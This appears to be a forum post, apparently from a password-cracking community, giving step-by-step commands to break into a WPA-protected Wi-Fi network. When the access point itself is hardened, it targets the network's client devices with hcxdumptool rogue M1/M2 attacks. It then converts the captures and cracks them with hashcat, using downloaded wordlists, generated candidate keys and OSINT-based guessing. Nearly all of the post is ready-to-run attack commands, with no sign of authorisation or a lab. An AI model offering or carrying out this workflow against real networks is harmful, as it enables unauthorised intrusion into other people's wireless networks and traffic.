I don't think that this kind of AP is using PMKID caching, because that doesn't make sense if the MAC changes often.
Please notice that the PMKID depend on the MAC:
Code:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
Maybe one of the CLIENTs of this NETWORK is weak (M1M2ROGUE). Try to attack them instead of the hardened AP:
Code:
$ hcdumptool -i INTERFACE -o dumpfile.pcapng --enable_status=23 --active_beacon --stop_client_m2_attacks=100
Run the attack for some hours, to make sure to get as much as possible information from CLIENTs.
If there are other APs or CLIENTs in range that you are not targeting, I recommend to protect them by BPFC.
from --help:
create BPF to protect a MAC
Code:
$ tcpdump -i <interface> not wlan addr1 11:22:33:44:55:66 and not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf
add all MACs to protect (each MAC as addr1 and addr2) separated by "and not wlan"
and run hcxdumptool with activated BPF:
Code:
$ hcdumptool -i INTERFACE -o dumpfile.pcapng --enable_status=23 --active_beacon --stop_client_m2_attacks=100 --bpfc=protect.bpf
Then convert to hc22000:
Code:
$ hcxpcapngtool -E wl -I wl -U wl --all -o test.hc22000 dumpfile.pcapng
Please notice:
We have to use --all, because NC is currently broken on hashcat.
https://hashcat.net/forum/thread-10253-p...#pid53602l
Now use hashcat on the recorded traffic as a first attempt:
Code:
$ hashcat -m 22000 test.hc22000 wl
proceed with hcxpsktool:
Code:
$ hcxpsktool -c test.hc22000 --weakpass --eudate --usdate --wpskeys | hashcat -m 22000 test.hc22000
proceed with wpa-sec confirmed lists:
Code:
$ wget https://wpa-sec.stanev.org/dict/rkg.txt.gz
$ hashcat -m 22000 test.hc22000 rkg.txt.gz
$ wget https://wpa-sec.stanev.org/dict/cracked.txt.gz
$ hashcat -m 22000 test.hc22000 cracked.txt.gz
If that doesn't work, do some open sources intelligence (OSINT) by DuckDuckGo picture search and try some masks and rules.
This wordlists may be useful, too:
https://3wifi.stascorp.com/3wifi-dic-2021-09-03.7z
https://hashmob.net/downloads
